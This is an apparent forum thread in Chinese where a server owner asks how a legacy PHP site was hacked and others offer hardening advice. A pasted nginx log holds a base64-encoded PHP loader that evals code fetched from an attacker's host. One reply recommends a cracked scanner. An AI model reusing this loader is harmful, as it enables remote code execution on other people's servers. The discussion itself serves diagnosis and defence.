服务器被攻击了，安全大佬来看下这是怎么攻击的

@oneisall8955 还是你狠，至今日志里天天都有一堆扫描器的痕迹

任意文件写 or rce
具体什么问题查流量日志的异常流量

selinux 一开。完事。

不要闲着没事蛋疼自己编译 php 。就用系统自带的。

debian 系的用 https://packages.sury.org/php/

rh 系的用 https://rpms.remirepo.net/

开启 selinux / apparmor 就不可能修改到你的配置文件

网站写的烂，被拿到 webshell 了。

你不关闭 22 端口的吗，最近挺多漏扫的，还是关闭了吧。

套 WAF 呀

网页服务器套 SELinux, 嫌麻烦就上 Debian 用 AppArmor, 不过效果会差一点
防火墙只开 80, 443 和一个随机的 ssh 端口
ssh 白名单, 要是白名单的网段大就再上 fail2ban

OP： 我有病，医生你快给我开药吧。。。
医生： 要不说说哪儿不舒服？
OP：我就是病了，你不是医生吗？快点开药啊。。。
医生：。。。。

就简单一句, 改为使用 ssh 密钥登录服务器, 禁用密码, 我的服务器都直接开放 22 端口的.

网上找破解的 awvs ，自己扫描一下

信息太少了，不过既然是 PHP 老项目，有一个可能是漏扫然后 getshell 了，之前服务器领导就部署了这种 shi 山老项目中招了，还好对方也没整什么大动作。。。emm 领导要这样搞我也管不着，只不过擦屁股有点烦

啥信息都没有, log 也没有, 还想看看咋样的, 好自我加强一下

安全问题，扫机器，看能不能处理，不能处理那就换个机器，把数据备份杀毒，再传新服务器-----这次在新机器上注意安全加固和扫一下自己的代码 部署的各个东西的版本有啥漏洞没

上午太忙了，下面是 nginx 的部分报错信息

2024/04/03 14:24:55 [error] 85023#0: *418871825 FastCGI sent in stderr: "PHP message: PHP Warning: file_get_contents( http://8.jsc20242.com:81/jsc/jsc.txt): failed to open stream: Connection timed out in data:;base64,PD9waHAgaW5pX3NldCgiZGlzcGxheV9lcnJvcnMiLCAib2ZmIik7ZXZhbCgnPz4nLmZpbGVfZ2V0X2NvbnRlbnRzKGJhc2U2NF9kZWNvZGUoJ2FIUjBjRG92THpndWFuTmpNakF5TkRJdVkyOXRPamd4TDJwell5OXFjMk11ZEhoMCcpKSk7Pz4=

不知道攻击者怎么修改 php.ini 的 auto_prepend_file 和 allow_url_include

搜一搜 PHP 高危漏洞，然后对比下你所使用的 PHP 版本，如果 PHP 版本比较老的话就会中招

网址告诉我，我帮你做个漏扫评估

@opengps #21 502 了

大概率你用宝塔部署 php 环境了吧，如果你用宝塔装了，就又很大概率中招，建议你卸掉宝塔，重新部署环境吧，稍微学一下，部署 php 环境很简单的。

@coderzhangsan 想起之前有个新来的主管问我为啥之前 Linux 服务器都不用宝塔 说脚本装的命令行维护太麻烦 换成他全装宝塔

@Beeium frp 竟然被打挂了，是你干的不？